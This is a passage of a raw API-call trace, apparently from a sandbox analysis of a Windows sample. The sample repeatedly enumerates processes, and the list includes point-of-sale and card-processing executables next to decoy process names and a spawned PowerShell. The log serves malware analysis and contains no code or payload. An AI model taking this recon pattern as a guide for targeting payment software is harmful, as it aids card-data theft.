th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0212.919] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0212.920] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0212.922] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0212.924] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0212.936] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0212.940] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0212.942] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0212.944] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0212.946] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0212.948] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0212.949] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0212.951] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0212.953] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0212.955] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0212.957] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0212.959] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.962] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0212.964] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0212.966] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.968] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.970] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0212.972] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0212.973] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0212.979] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0212.981] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0212.984] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0212.986] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0212.987] CloseHandle (hObject=0x1eb8) returned 1 [0212.988] Sleep (dwMilliseconds=0x64) [0213.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0213.054] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0213.056] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0213.057] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0213.059] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.060] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0213.062] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0213.064] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0213.069] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0213.070] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0213.072] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.073] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.075] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0213.077] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.078] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.080] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.082] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.083] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.085] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.086] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.088] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0213.089] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0213.091] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0213.093] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0213.094] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.097] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0213.099] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0213.100] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0213.102] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0213.106] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0213.108] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0213.110] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.111] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.113] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0213.114] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0213.115] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0213.118] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0213.119] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0213.121] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0213.122] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0213.124] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0213.126] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0213.127] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0213.129] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0213.131] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0213.132] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0213.134] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0213.135] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0213.137] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0213.139] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0213.141] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0213.142] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0213.143] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0213.145] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0213.149] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0213.151] Process32Next (in: hSnapshot=0x1eb8, 